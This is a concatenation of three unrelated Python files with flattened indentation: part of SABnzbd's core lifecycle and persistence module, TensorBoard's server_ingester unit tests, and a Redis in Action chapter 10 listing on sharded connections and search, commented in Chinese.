if not cfg.sched_converted():
schedules = cfg.schedules()
newsched = []
for sched in schedules:
if "speedlimit" in sched:
newsched.append(re.sub(r"(speedlimit \d+)$", r"\1K", sched))
else:
newsched.append(sched)
cfg.schedules.set(newsched)
cfg.sched_converted.set(1)
# Second time schedule conversion
if cfg.sched_converted() != 2:
cfg.schedules.set(["%s %s" % (1, schedule) for schedule in cfg.schedules()])
cfg.sched_converted.set(2)
config.save_config()
# Add hostname to the whitelist
if not cfg.host_whitelist():
cfg.host_whitelist.set(socket.gethostname())
# Do repair if requested
if check_repair_request():
repair = 2
pause_downloader = True
# Initialize threads
rss.init()
paused = BPSMeter.do.read()
NzbQueue()
Downloader(pause_downloader or paused)
Assembler()
PostProcessor()
NzbQueue.do.read_queue(repair)
DirScanner()
Rating()
URLGrabber()
scheduler.init()
if evalSched:
scheduler.analyse(pause_downloader)
logging.info("All processes started")
RESTART_REQ = False
__INITIALIZED__ = True
return True
@synchronized(INIT_LOCK)
def start():
global __INITIALIZED__
if __INITIALIZED__:
logging.debug("Starting postprocessor")
PostProcessor.do.start()
logging.debug("Starting assembler")
Assembler.do.start()
logging.debug("Starting downloader")
Downloader.do.start()
scheduler.start()
logging.debug("Starting dirscanner")
DirScanner.do.start()
Rating.do.start()
logging.debug("Starting urlgrabber")
URLGrabber.do.start()
@synchronized(INIT_LOCK)
def halt():
global __INITIALIZED__, __SHUTTING_DOWN__
if __INITIALIZED__:
logging.info("SABnzbd shutting down...")
__SHUTTING_DOWN__ = True
# Stop the windows tray icon
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
sabnzbd.zconfig.remove_server()
sabnzbd.directunpacker.abort_all()
rss.stop()
logging.debug("Stopping URLGrabber")
URLGrabber.do.stop()
try:
URLGrabber.do.join()
except:
pass
logging.debug("Stopping rating")
Rating.do.stop()
try:
Rating.do.join()
except:
pass
logging.debug("Stopping dirscanner")
DirScanner.do.stop()
try:
DirScanner.do.join()
except:
pass
# Stop Required Objects
logging.debug("Stopping downloader")
sabnzbd.downloader.stop()
logging.debug("Stopping assembler")
Assembler.do.stop()
try:
Assembler.do.join()
except:
pass
logging.debug("Stopping postprocessor")
PostProcessor.do.stop()
try:
PostProcessor.do.join()
except:
pass
# Save State
try:
save_state()
except:
logging.error(T("Fatal error at saving state"), exc_info=True)
# The Scheduler cannot be stopped when the stop was scheduled.
# Since all warm-restarts have been removed, it's not longer
# needed to stop the scheduler.
# We must tell the scheduler to deactivate.
scheduler.abort()
logging.info("All processes stopped")
__INITIALIZED__ = False
def trigger_restart(timeout=None):
""" Trigger a restart by setting a flag an shutting down CP """
# Sometimes we need to wait a bit to send good-bye to the browser
if timeout:
time.sleep(timeout)
# Add extra arguments
if sabnzbd.downloader.Downloader.do.paused:
sabnzbd.RESTART_ARGS.append("-p")
sys.argv = sabnzbd.RESTART_ARGS
# Stop all services
sabnzbd.halt()
cherrypy.engine.exit()
if sabnzbd.WIN32:
# Remove connection info for faster restart
del_connection_info()
# Leave the harder restarts to the polling in SABnzbd.py
if sabnzbd.WIN_SERVICE or getattr(sys, "frozen", None) == "macosx_app":
sabnzbd.TRIGGER_RESTART = True
else:
# Do the restart right now
cherrypy.engine._do_execv()
##############################################################################
# Misc Wrappers
##############################################################################
def new_limit():
""" Callback for article cache changes """
ArticleCache.do.new_limit(cfg.cache_limit.get_int())
def guard_restart():
""" Callback for config options requiring a restart """
global RESTART_REQ
sabnzbd.RESTART_REQ = True
def guard_top_only():
""" Callback for change of top_only option """
NzbQueue.do.set_top_only(cfg.top_only())
def guard_pause_on_pp():
""" Callback for change of pause-download-on-pp """
if cfg.pause_on_post_processing():
pass # Not safe to idle downloader, because we don't know
# if post-processing is active now
else:
Downloader.do.resume_from_postproc()
def guard_quota_size():
""" Callback for change of quota_size """
BPSMeter.do.change_quota()
def guard_quota_dp():
""" Callback for change of quota_day or quota_period """
scheduler.restart(force=True)
def guard_language():
""" Callback for change of the interface language """
sabnzbd.lang.set_language(cfg.language())
sabnzbd.api.clear_trans_cache()
def set_https_verification(value):
""" Set HTTPS-verification state while returning current setting
False = disable verification
"""
prev = ssl._create_default_https_context == ssl.create_default_context
if value:
ssl._create_default_https_context = ssl.create_default_context
else:
ssl._create_default_https_context = ssl._create_unverified_context
return prev
def guard_https_ver():
""" Callback for change of https verification """
set_https_verification(cfg.enable_https_verification())
def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None):
""" Add NZB based on a URL, attributes optional """
if "http" not in url:
return
if not pp or pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
logging.info("Fetching %s", url)
# Add feed name if it came from RSS
msg = T("Trying to fetch NZB from %s") % url
if nzbname:
msg = "%s - %s" % (nzbname, msg)
# Generate the placeholder
future_nzo = NzbQueue.do.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname)
URLGrabber.do.add(url, future_nzo)
return future_nzo.nzo_id
def save_state():
""" Save all internal bookkeeping to disk """
ArticleCache.do.flush_articles()
NzbQueue.do.save()
BPSMeter.do.save()
rss.save()
Rating.do.save()
DirScanner.do.save()
PostProcessor.do.save()
def pause_all():
""" Pause all activities than cause disk access """
global PAUSED_ALL
PAUSED_ALL = True
Downloader.do.pause()
logging.debug("PAUSED_ALL active")
def unpause_all():
""" Resume all activities """
global PAUSED_ALL
PAUSED_ALL = False
Downloader.do.resume()
logging.debug("PAUSED_ALL inactive")
##############################################################################
# NZB Saving Methods
##############################################################################
def backup_exists(filename):
""" Return True if backup exists and no_dupes is set """
path = cfg.nzb_backup_dir.get_path()
return path and os.path.exists(os.path.join(path, filename + ".gz"))
def backup_nzb(filename, data):
""" Backup NZB file """
path = cfg.nzb_backup_dir.get_path()
if path:
save_compressed(path, filename, data)
def save_compressed(folder, filename, data):
""" Save compressed NZB file in folder """
if filename.endswith(".nzb"):
filename += ".gz"
else:
filename += ".nzb.gz"
logging.info("Backing up %s", os.path.join(folder, filename))
try:
# Have to get around the path being put inside the tgz
with open(os.path.join(folder, filename), "wb") as tgz_file:
f = gzip.GzipFile(filename, fileobj=tgz_file)
f.write(encoding.utob(data))
f.flush()
f.close()
except:
logging.error(T("Saving %s failed"), os.path.join(folder, filename))
logging.info("Traceback: ", exc_info=True)
##############################################################################
# Unsynchronized methods
##############################################################################
def add_nzbfile(
nzbfile, pp=None, script=None, cat=None, priority=NORMAL_PRIORITY, nzbname=None, reuse=False, password=None
):
""" Add disk-based NZB file, optional attributes,
'reuse' flag will suppress duplicate detection
"""
if pp and pp == "-1":
pp = None
if script and script.lower() == "default":
script = None
if cat and cat.lower() == "default":
cat = None
if isinstance(nzbfile, str):
# File coming from queue repair
filename = nzbfile
keep = True
else:
# TODO: CherryPy mangles unicode-filenames!
# See https://github.com/cherrypy/cherrypy/issues/1766
filename = encoding.correct_unknown_encoding(nzbfile.filename)
keep = False
if not sabnzbd.WIN32:
# If windows client sends file to Unix server backslashes may
# be included, so convert these
filename = filename.replace("\\", "/")
filename = os.path.basename(filename)
ext = os.path.splitext(filename)[1]
if ext.lower() in VALID_ARCHIVES:
suffix = ext.lower()
else:
suffix = ".nzb"
logging.info("Adding %s", filename)
if isinstance(nzbfile, str):
path = nzbfile
else:
try:
nzb_file, path = tempfile.mkstemp(suffix=suffix)
os.write(nzb_file, nzbfile.value)
os.close(nzb_file)
except OSError:
logging.error(T("Cannot create temp file for %s"), filename)
logging.info("Traceback: ", exc_info=True)
return None
if ext.lower() in VALID_ARCHIVES:
return process_nzb_archive_file(
filename, path, pp, script, cat, priority=priority, nzbname=nzbname, password=password
)
else:
return process_single_nzb(
filename,
path,
pp,
script,
cat,
priority=priority,
nzbname=nzbname,
keep=keep,
reuse=reuse,
password=password,
)
def enable_server(server):
""" Enable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(1)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def disable_server(server):
""" Disable server (scheduler only) """
try:
config.get_config("servers", server).enable.set(0)
except:
logging.warning(T("Trying to set status of non-existing server %s"), server)
return
config.save_config()
Downloader.do.update_server(server, server)
def system_shutdown():
""" Shutdown system after halting download and saving bookkeeping """
logging.info("Performing system shutdown")
Thread(target=halt).start()
while __INITIALIZED__:
time.sleep(1.0)
if sabnzbd.WIN32:
powersup.win_shutdown()
elif DARWIN:
powersup.osx_shutdown()
else:
powersup.linux_shutdown()
def system_hibernate():
""" Hibernate system """
logging.info("Performing system hybernation")
if sabnzbd.WIN32:
powersup.win_hibernate()
elif DARWIN:
powersup.osx_hibernate()
else:
powersup.linux_hibernate()
def system_standby():
""" Standby system """
logging.info("Performing system standby")
if sabnzbd.WIN32:
powersup.win_standby()
elif DARWIN:
powersup.osx_standby()
else:
powersup.linux_standby()
def shutdown_program():
""" Stop program after halting and saving """
logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name())
sabnzbd.halt()
cherrypy.engine.exit()
sabnzbd.SABSTOP = True
def restart_program():
""" Restart program (used by scheduler) """
logging.info("Scheduled restart request")
# Just set the stop flag, because stopping CherryPy from
# the scheduler is not reliable
sabnzbd.TRIGGER_RESTART = True
def change_queue_complete_action(action, new=True):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
When "new" is False, check whether non-script actions are acceptable
"""
global QUEUECOMPLETE, QUEUECOMPLETEACTION, QUEUECOMPLETEARG
_action = None
_argument = None
if "script_" in action:
# all scripts are labeled script_xxx
_action = run_script
_argument = action.replace("script_", "")
elif new or cfg.queue_complete_pers.get():
if action == "shutdown_pc":
_action = system_shutdown
elif action == "hibernate_pc":
_action = system_hibernate
elif action == "standby_pc":
_action = system_standby
elif action == "shutdown_program":
_action = shutdown_program
else:
action = None
else:
action = None
if new:
cfg.queue_complete.set(action or "")
config.save_config()
# keep the name of the action for matching the current select in queue.tmpl
QUEUECOMPLETE = action
QUEUECOMPLETEACTION = _action
QUEUECOMPLETEARG = _argument
def run_script(script):
""" Run a user script (queue complete only) """
command = [os.path.join(cfg.script_dir.get_path(), script)]
if os.path.exists(command[0]):
try:
stup, need_shell, command, creationflags = sabnzbd.newsunpack.build_command(command)
logging.info("Spawning external command %s", command)
subprocess.Popen(
command,
shell=need_shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=stup,
creationflags=creationflags,
)
except:
logging.debug("Failed script %s, Traceback: ", script, exc_info=True)
def empty_queues():
""" Return True if queues empty or non-existent """
global __INITIALIZED__
return (not __INITIALIZED__) or (PostProcessor.do.empty() and NzbQueue.do.is_empty())
def keep_awake():
""" If we still have work to do, keep Windows/OSX system awake """
if KERNEL32 or FOUNDATION:
if sabnzbd.cfg.keep_awake():
awake = False
if (not Downloader.do.is_paused() and not NzbQueue.do.is_empty()) or (
not PostProcessor.do.paused and not PostProcessor.do.empty()
):
awake = True
if KERNEL32:
# set ES_SYSTEM_REQUIRED
KERNEL32.SetThreadExecutionState(ctypes.c_int(0x00000001))
else:
sleepless.keep_awake("SABnzbd is busy downloading and/or post-processing")
if not awake and FOUNDATION:
sleepless.allow_sleep()
################################################################################
# Data IO #
################################################################################
def get_new_id(prefix, folder, check_list=None):
""" Return unique prefixed admin identifier within folder
optionally making sure that id is not in the check_list.
"""
for n in range(10000):
try:
if not os.path.exists(folder):
os.makedirs(folder)
fd, path = tempfile.mkstemp("", "SABnzbd_%s_" % prefix, folder)
os.close(fd)
head, tail = os.path.split(path)
if not check_list or tail not in check_list:
return tail
except:
logging.error(T("Failure in tempfile.mkstemp"))
logging.info("Traceback: ", exc_info=True)
break
# Cannot create unique id, crash the process
raise IOError
def save_data(data, _id, path, do_pickle=True, silent=False):
""" Save data to a diskfile """
if not silent:
logging.debug("[%s] Saving data for %s in %s", misc.caller_name(), _id, path)
path = os.path.join(path, _id)
# We try 3 times, to avoid any dict or access problems
for t in range(3):
try:
with open(path, "wb") as data_file:
if do_pickle:
pickle.dump(data, data_file, protocol=pickle.HIGHEST_PROTOCOL)
else:
data_file.write(data)
break
except:
if silent:
# This can happen, probably a removed folder
pass
elif t == 2:
logging.error(T("Saving %s failed"), path)
logging.info("Traceback: ", exc_info=True)
else:
# Wait a tiny bit before trying again
time.sleep(0.1)
def load_data(data_id, path, remove=True, do_pickle=True, silent=False):
""" Read data from disk file """
path = os.path.join(path, data_id)
if not os.path.exists(path):
logging.info("[%s] %s missing", misc.caller_name(), path)
return None
if not silent:
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id, path)
try:
with open(path, "rb") as data_file:
if do_pickle:
try:
data = pickle.load(data_file, encoding=sabnzbd.encoding.CODEPAGE)
except UnicodeDecodeError:
# Could be Python 2 data that we can load using old encoding
data = pickle.load(data_file, encoding="latin1")
else:
data = data_file.read()
if remove:
filesystem.remove_file(path)
except:
logging.error(T("Loading %s failed"), path)
logging.info("Traceback: ", exc_info=True)
return None
return data
def remove_data(_id, path):
""" Remove admin file """
path = os.path.join(path, _id)
try:
if os.path.exists(path):
filesystem.remove_file(path)
except:
logging.debug("Failed to remove %s", path)
def save_admin(data, data_id):
""" Save data in admin folder in specified format """
logging.debug("[%s] Saving data for %s", misc.caller_name(), data_id)
save_data(data, data_id, cfg.admin_dir.get_path())
def load_admin(data_id, remove=False, silent=False):
""" Read data in admin folder in specified format """
logging.debug("[%s] Loading data for %s from %s", misc.caller_name(), data_id)
return load_data(data_id, cfg.admin_dir.get_path(), remove=remove, silent=silent)
def pp_to_opts(pp):
""" Convert numeric processing options to (repair, unpack, delete) """
# Convert the pp to an int
pp = sabnzbd.interface.int_conv(pp)
if pp == 0:
return False, False, False
if pp == 1:
return True, False, False
if pp == 2:
return True, True, False
return True, True, True
def opts_to_pp(repair, unpack, delete):
""" Convert (repair, unpack, delete) to numeric process options """
if repair is None:
return None
pp = 0
if repair:
pp = 1
if unpack:
pp = 2
if delete:
pp = 3
return pp
def request_repair():
""" Request a full repair on next restart """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
try:
f = open(path, "w")
f.write("\n")
f.close()
except:
pass
def check_repair_request():
""" Return True if repair request found, remove afterwards """
path = os.path.join(cfg.admin_dir.get_path(), REPAIR_REQUEST)
if os.path.exists(path):
try:
filesystem.remove_file(path)
except:
pass
return True
return False
def check_all_tasks():
""" Check every task and restart safe ones, else restart program
Return True when everything is under control
"""
if __SHUTTING_DOWN__ or not __INITIALIZED__:
return True
# Non-restartable threads, require program restart
if not sabnzbd.PostProcessor.do.isAlive():
logging.info("Restarting because of crashed postprocessor")
return False
if not Downloader.do.isAlive():
logging.info("Restarting because of crashed downloader")
return False
if not Assembler.do.isAlive():
logging.info("Restarting because of crashed assembler")
return False
# Kick the downloader, in case it missed the semaphore
Downloader.do.wakeup()
# Make sure the right servers are active
Downloader.do.check_timers()
# Restartable threads
if not DirScanner.do.isAlive():
logging.info("Restarting crashed dirscanner")
DirScanner.do.__init__()
if not URLGrabber.do.isAlive():
logging.info("Restarting crashed urlgrabber")
URLGrabber.do.__init__()
if not Rating.do.isAlive():
logging.info("Restarting crashed rating")
Rating.do.__init__()
if not sabnzbd.scheduler.sched_check():
logging.info("Restarting crashed scheduler")
sabnzbd.scheduler.init()
sabnzbd.downloader.Downloader.do.unblock_all()
# Check one-shot pause
sabnzbd.scheduler.pause_check()
# Check (and terminate) idle jobs
sabnzbd.nzbqueue.NzbQueue.do.stop_idle_jobs()
return True
def pid_file(pid_path=None, pid_file=None, port=0):
""" Create or remove pid file """
global DIR_PID
if not sabnzbd.WIN32:
if pid_path and pid_path.startswith("/"):
DIR_PID = os.path.join(pid_path, "sabnzbd-%d.pid" % port)
elif pid_file and pid_file.startswith("/"):
DIR_PID = pid_file
if DIR_PID:
try:
if port:
f = open(DIR_PID, "w")
f.write("%d\n" % os.getpid())
f.close()
else:
filesystem.remove_file(DIR_PID)
except:
logging.warning("Cannot access PID file %s", DIR_PID)
def check_incomplete_vs_complete():
""" Make sure "incomplete" and "complete" are not identical """
complete = cfg.complete_dir.get_path()
if filesystem.same_file(cfg.download_dir.get_path(), complete):
if filesystem.real_path("X", cfg.download_dir()) == cfg.download_dir():
# Abs path, so set an abs path too
cfg.download_dir.set(os.path.join(complete, "incomplete"))
else:
cfg.download_dir.set("incomplete")
def wait_for_download_folder():
""" Wait for download folder to become available """
while not cfg.download_dir.test_path():
logging.debug('Waiting for "incomplete" folder')
time.sleep(2.0)
# Required wrapper because nzbstuff.py cannot import downloader.py
def highest_server(me):
return sabnzbd.downloader.Downloader.do.highest_server(me)
def test_ipv6():
""" Check if external IPv6 addresses are reachable """
if not cfg.selftest_host():
# User disabled the test, assume active IPv6
return True
try:
info = getipaddress.addresslookup6(cfg.selftest_host())
except:
logging.debug(
"Test IPv6: Disabling IPv6, because it looks like it's not available. Reason: %s", sys.exc_info()[0]
)
return False
try:
af, socktype, proto, canonname, sa = info[0]
sock = socket.socket(af, socktype, proto)
sock.settimeout(2) # 2 second timeout
sock.connect(sa[0:2])
sock.close()
logging.debug("Test IPv6: IPv6 test successful. Enabling IPv6")
return True
except socket.error:
logging.debug("Test IPv6: Cannot reach IPv6 test host. Disabling IPv6")
return False
except:
logging.debug("Test IPv6: Problem during IPv6 connect. Disabling IPv6. Reason: %s", sys.exc_info()[0])
return False
def test_cert_checking():
""" Test quality of certificate validation """
# User disabled the test, assume proper SSL certificates
if not cfg.selftest_host():
return True
# Try a connection to our test-host
try:
ctx = ssl.create_default_context()
base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ctx.wrap_socket(base_sock, server_hostname=cfg.selftest_host())
ssl_sock.settimeout(2.0)
ssl_sock.connect((cfg.selftest_host(), 443))
ssl_sock.close()
return True
except (socket.gaierror, socket.timeout):
# Non-SSL related error.
# We now assume that certificates work instead of forcing
# lower quality just because some (temporary) internet problem
logging.info("Could not determine system certificate validation quality due to connection problems")
return True
except:
# Seems something is still wrong
sabnzbd.set_https_verification(False)
return False
def history_updated():
""" To make sure we always have a fresh history """
sabnzbd.LAST_HISTORY_UPDATE += 1
# Never go over the limit
if sabnzbd.LAST_HISTORY_UPDATE + 1 >= sys.maxsize:
sabnzbd.LAST_HISTORY_UPDATE = 1
|
server_ingester_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for `tensorboard.data.server_ingester`."""
import os
import subprocess
import tempfile
import threading
import time
from unittest import mock
import grpc
from tensorboard import test as tb_test
from tensorboard.data import grpc_provider
from tensorboard.data import server_ingester
from tensorboard.util import grpc_util
class ExistingServerDataIngesterTest(tb_test.TestCase):
def test(self):
addr = "localhost:6806"
with mock.patch.object(grpc, "secure_channel", autospec=True):
ingester = server_ingester.ExistingServerDataIngester(
addr,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
class SubprocessServerDataIngesterTest(tb_test.TestCase):
def test(self):
# Create a fake server binary so that the `os.path.exists` check
# passes.
fake_binary_path = os.path.join(self.get_temp_dir(), "server")
with open(fake_binary_path, "wb"):
pass
binary_info = server_ingester.ServerBinary(
fake_binary_path, version=None
)
tmpdir = tempfile.TemporaryDirectory()
self.enter_context(
mock.patch.object(
tempfile, "TemporaryDirectory", return_value=tmpdir
)
)
port_file = os.path.join(tmpdir.name, "port")
error_file = os.path.join(tmpdir.name, "startup_error")
real_popen = subprocess.Popen
# Stub out `subprocess.Popen` to write the port file.
def fake_popen(subprocess_args, *args, **kwargs):
def target():
time.sleep(0.2) # wait one cycle
with open(port_file, "w") as outfile:
outfile.write("23456\n")
result = mock.create_autospec(real_popen, instance=True)
result.stdin = mock.Mock()
result.poll = lambda: None
result.pid = 789
threading.Thread(target=target).start()
return result
tilde_logdir = "~/tmp/logs"
expanded_logdir = os.path.expanduser(tilde_logdir)
self.assertNotEqual(tilde_logdir, expanded_logdir)
with mock.patch.object(subprocess, "Popen", wraps=fake_popen) as popen:
with mock.patch.object(grpc, "secure_channel", autospec=True) as sc:
ingester = server_ingester.SubprocessServerDataIngester(
server_binary=binary_info,
logdir=tilde_logdir,
reload_interval=5,
channel_creds_type=grpc_util.ChannelCredsType.LOCAL,
samples_per_plugin={
"scalars": 500,
"images": 0,
},
)
ingester.start()
self.assertIsInstance(
ingester.data_provider, grpc_provider.GrpcDataProvider
)
expected_args = [
fake_binary_path,
"--logdir=%s" % expanded_logdir,
"--reload=5",
"--samples-per-plugin=scalars=500,images=all",
"--port=0",
"--port-file=%s" % port_file,
"--die-after-stdin",
"--error-file=%s" % error_file,
"--verbose", # logging is enabled in tests
]
popen.assert_called_once_with(expected_args, stdin=subprocess.PIPE)
sc.assert_called_once_with(
"localhost:23456", mock.ANY, options=mock.ANY
)
class ServerInfoTest(tb_test.TestCase):
def test_version_none(self):
b = server_ingester.ServerBinary("./server", version=None)
self.assertTrue(b.at_least_version("0.1.0"))
self.assertTrue(b.at_least_version("999.999.999"))
def test_version_final_release(self):
b = server_ingester.ServerBinary("./server", version="0.4.0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertFalse(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
def test_version_prerelease(self):
b = server_ingester.ServerBinary("./server", version="0.5.0a0")
self.assertTrue(b.at_least_version("0.4.0"))
self.assertTrue(b.at_least_version("0.5.0a0"))
self.assertFalse(b.at_least_version("0.5.0"))
if __name__ == "__main__":
tb_test.main()
|
ch10_listing_source.py
|
# coding: utf-8
import binascii
from collections import defaultdict
from datetime import date
from decimal import Decimal
import functools
import json
from Queue import Empty, Queue
import threading
import time
import unittest
import uuid
import redis
CONFIGS = {}
CHECKED = {}
def get_config(conn, type, component, wait=1):
key = 'config:%s:%s'%(type, component)
if CHECKED.get(key) < time.time() - wait: #A
CHECKED[key] = time.time() #B
config = json.loads(conn.get(key) or '{}') #C
config = dict((str(k), config[k]) for k in config)
old_config = CONFIGS.get(key) #D
if config != old_config: #E
CONFIGS[key] = config #F
return CONFIGS.get(key)
REDIS_CONNECTIONS = {}
config_connection = None
def redis_connection(component, wait=1): #A
key = 'config:redis:' + component #B
def wrapper(function): #C
@functools.wraps(function) #D
def call(*args, **kwargs): #E
old_config = CONFIGS.get(key, object()) #F
_config = get_config( #G
config_connection, 'redis', component, wait) #G
config = {}
for k, v in _config.iteritems(): #L
config[k.encode('utf-8')] = v #L
if config != old_config: #H
REDIS_CONNECTIONS[key] = redis.Redis(**config) #H
return function( #I
REDIS_CONNECTIONS.get(key), *args, **kwargs) #I
return call #J
return wrapper #K
def index_document(conn, docid, words, scores):
pipeline = conn.pipeline(True)
for word in words: #I
pipeline.sadd('idx:' + word, docid) #I
pipeline.hmset('kb:doc:%s'%docid, scores)
return len(pipeline.execute()) #J
def parse_and_search(conn, query, ttl):
id = str(uuid.uuid4())
conn.sinterstore('idx:' + id,
['idx:'+key for key in query])
conn.expire('idx:' + id, ttl)
return id
def search_and_sort(conn, query, id=None, ttl=300, sort="-updated", #A
start=0, num=20): #A
desc = sort.startswith('-') #B
sort = sort.lstrip('-') #B
by = "kb:doc:*->" + sort #B
alpha = sort not in ('updated', 'id', 'created') #I
if id and not conn.expire(id, ttl): #C
id = None #C
if not id: #D
id = parse_and_search(conn, query, ttl=ttl) #D
pipeline = conn.pipeline(True)
pipeline.scard('idx:' + id) #E
pipeline.sort('idx:' + id, by=by, alpha=alpha, #F
desc=desc, start=start, num=num) #F
results = pipeline.execute()
return results[0], results[1], id #G
def zintersect(conn, keys, ttl):
id = str(uuid.uuid4())
conn.zinterstore('idx:' + id,
dict(('idx:'+k, v) for k,v in keys.iteritems()))
conn.expire('idx:' + id, ttl)
return id
def search_and_zsort(conn, query, id=None, ttl=300, update=1, vote=0, #A
start=0, num=20, desc=True): #A
if id and not conn.expire(id, ttl): #B
id = None #B
if not id: #C
id = parse_and_search(conn, query, ttl=ttl) #C
scored_search = { #D
id: 0, #D
'sort:update': update, #D
'sort:votes': vote #D
}
id = zintersect(conn, scored_search, ttl) #E
pipeline = conn.pipeline(True)
pipeline.zcard('idx:' + id) #F
if desc: #G
pipeline.zrevrange('idx:' + id, start, start + num - 1) #G
else: #G
pipeline.zrange('idx:' + id, start, start + num - 1) #G
results = pipeline.execute()
return results[0], results[1], id #H
def execute_later(conn, queue, name, args):
t = threading.Thread(target=globals()[name], args=tuple(args))
t.setDaemon(1)
t.start()
HOME_TIMELINE_SIZE = 1000
POSTS_PER_PASS = 1000
def shard_key(base, key, total_elements, shard_size): #A
if isinstance(key, (int, long)) or key.isdigit(): #B
shard_id = int(str(key), 10) // shard_size #C
else:
shards = 2 * total_elements // shard_size #D
shard_id = binascii.crc32(key) % shards #E
return "%s:%s"%(base, shard_id) #F
def shard_sadd(conn, base, member, total_elements, shard_size):
shard = shard_key(base,
'x'+str(member), total_elements, shard_size) #A
return conn.sadd(shard, member) #B
SHARD_SIZE = 512
EXPECTED = defaultdict(lambda: 1000000)
# 代码清单 10-1
# <start id="get-connection"/>
def get_redis_connection(component, wait=1):
key = 'config:redis:' + component
# 尝试获取旧的配置。
old_config = CONFIGS.get(key, object())
# 尝试获取新的配置。
config = get_config(
config_connection, 'redis', component, wait)
# 如果新旧配置不相同,那么创建一个新的连接。
if config != old_config:
REDIS_CONNECTIONS[key] = redis.Redis(**config)
# 返回用户指定的连接对象。
return REDIS_CONNECTIONS.get(key)
# <end id="get-connection"/>
# 代码清单 10-2
# <start id="get-sharded-connection"/>
def get_sharded_connection(component, key, shard_count, wait=1):
# 计算出 “<组件名>:<分片数字>” 格式的分片 ID 。
shard = shard_key(component, 'x'+str(key), shard_count, 2)
# 返回连接。
return get_redis_connection(shard, wait)
# <end id="get-sharded-connection"/>
# <start id="no-decorator-example"/>
def log_recent(conn, app, message):
'the old log_recent() code'
log_recent = redis_connection('logs')(log_recent) # 通过反复执行 3 次这行代码,可以达到和装饰器一样的效果
# <end id="no-decorator-example"/>
# 代码清单 10-3
# <start id="shard-aware-decorator"/>
# 装饰器接受组件名以及预期的分片数量作为参数。
def sharded_connection(component, shard_count, wait=1):
# 创建一个包装器,使用它去装饰传入的函数。
def wrapper(function):
# 从原始函数里面复制一些有用的元信息到配置处理器。
@functools.wraps(function)
# 创建一个函数,它负责计算键的分片 ID ,并对连接管理器进行设置。
def call(key, *args, **kwargs):
# 获取分片连接。
conn = get_sharded_connection(
component, key, shard_count, wait)
# 实际地调用被装饰的函数,并将分片连接以及其他参数传递给它。
return function(conn, key, *args, **kwargs)
# 返回被包装后的函数。
return call
# 返回一个函数,它可以对需要分片连接的函数进行包装。
return wrapper
# <end id="shard-aware-decorator"/>
# 代码清单 10-4
# <start id="sharded-count-unique"/>
# 将 count_visit() 函数分片到 16 台机器上面执行,
# 执行所得的结果将被自动地分片到每台机器的多个数据库键上面。
@sharded_connection('unique', 16)
def count_visit(conn, session_id):
today = date.today()
key = 'unique:%s'%today.isoformat()
# 经过修改的 get_expected() 调用。
conn2, expected = get_expected(key, today)
id = int(session_id.replace('-', '')[:15], 16)
if shard_sadd(conn, key, id, expected, SHARD_SIZE):
# 使用 get_expected() 函数返回的非分片(nonsharded)连接,
# 对唯一计数器执行自增操作。
conn2.incr(key)
# 对 get_expected() 函数使用非分片连接。
@redis_connection('unique')
def get_expected(conn, key, today):
'all of the same function body as before, except the last line'
# 返回非分片连接,
# 使得 count_visit() 函数可以在有需要的时候,
# 对唯一计数器执行自增操作。
return conn, EXPECTED[key]
# <end id="sharded-count-unique"/>
# 代码清单 10-5
# <start id="search-with-values"/>
# 这个函数接受的参数与 search_and_sort() 函数接受的参数完全相同。
def search_get_values(conn, query, id=None, ttl=300, sort="-updated",
start=0, num=20):
# 首先取得搜索操作和排序操作的执行结果。
count, docids, id = search_and_sort(
conn, query, id, ttl, sort, 0, start+num)
key = "kb:doc:%s"
sort = sort.lstrip('-')
pipe = conn.pipeline(False)
# 根据结果的排序方式来获取数据。
for docid in docids:
pipe.hget(key%docid, sort)
sort_column = pipe.execute()
# 将文档 ID 以及对文档进行排序产生的数据进行配对(pair up)。
data_pairs = zip(docids, sort_column)
# 返回结果包含的文档数量、排序之后的搜索结果以及结果的缓存 ID 。
return count, data_pairs, id
# <end id="search-with-values"/>
# 代码清单 10-6
# <start id="search-on-shards"/>
# 程序为了获知自己要连接的服务器,
# 会假定所有分片服务器的信息都记录在一个标准的配置位置里面。
def get_shard_results(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1):
# 准备一些结构,用于储存之后获取的数据。
count = 0
data = []
# 尝试使用已被缓存的搜索结果;
# 如果没有缓存结果可用,那么重新执行查询。
ids = ids or shards * [None]
for shard in xrange(shards):
# 获取或者创建一个连向指定分片的连接。
conn = get_redis_connection('%s:%s'%(component, shard), wait)
# 获取搜索结果以及它们的排序数据。
c, d, i = search_get_values(
conn, query, ids[shard], ttl, sort, start, num)
# 将这个分片的计算结果与其他分片的计算结果进行合并。
count += c
data.extend(d)
ids[shard] = i
# 把所有分片的原始(raw)计算结果返回给调用者。
return count, data, ids
# <end id="search-on-shards"/>
def get_values_thread(component, shard, wait, rqueue, *args, **kwargs):
conn = get_redis_connection('%s:%s'%(component, shard), wait)
count, results, id = search_get_values(conn, *args, **kwargs)
rqueue.put((shard, count, results, id))
